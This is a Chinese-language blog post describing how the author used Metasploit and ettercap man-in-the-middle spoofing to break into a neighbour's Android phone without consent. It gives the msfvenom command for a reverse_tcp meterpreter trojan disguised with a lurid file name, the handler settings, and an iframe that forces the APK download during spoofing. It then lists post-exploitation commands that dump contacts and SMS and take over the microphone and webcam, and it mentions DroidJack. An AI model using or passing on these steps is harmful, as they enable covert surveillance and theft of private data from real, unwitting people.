酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

metasploit+ettercap中间人攻击成功入侵邻居手机

2018-9-22 12:28 作者:酷帥王子 | 黑盒网络渗透测试 |

五、msf+ettercap入侵邻居安卓手机

首先启动msf

先用kali生成一个安卓木马,如下命令:

Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk

为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻

然后进入msf

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.0.109 //ipkailiip

set LPORT 44444 //端口一定要与前面生成的木马的端口一致

Exploit

 

下面我们开启ettercap -G

我物理IP

 

别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,

下面我们来设置一下

 

在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,

 

 

 

 

 

 

 

 

 

 

 

 

 

下面我们开始攻击

 

 

 

 

 

大概过了5分钟多,发现反弹成功了

 

 

 

 

 

 

 

执行命令

 

dump_contacts    --》这个是导出电话

dump_sms --》这个是导出信息

record_mic     Record audio from the default microphone for X seconds

    webcam_chat    Start a video chat

    webcam_list    List webcams

    webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

 

 

我们打开看一下电话薄,

 

 

 

 

 

 

我们同时欺骗成DroidJack木马,使用方法如图:

 

 

 

切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口

 

 

 


文章作者:酷帥王子
文章地址:https://6kb.org:443/post-50.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.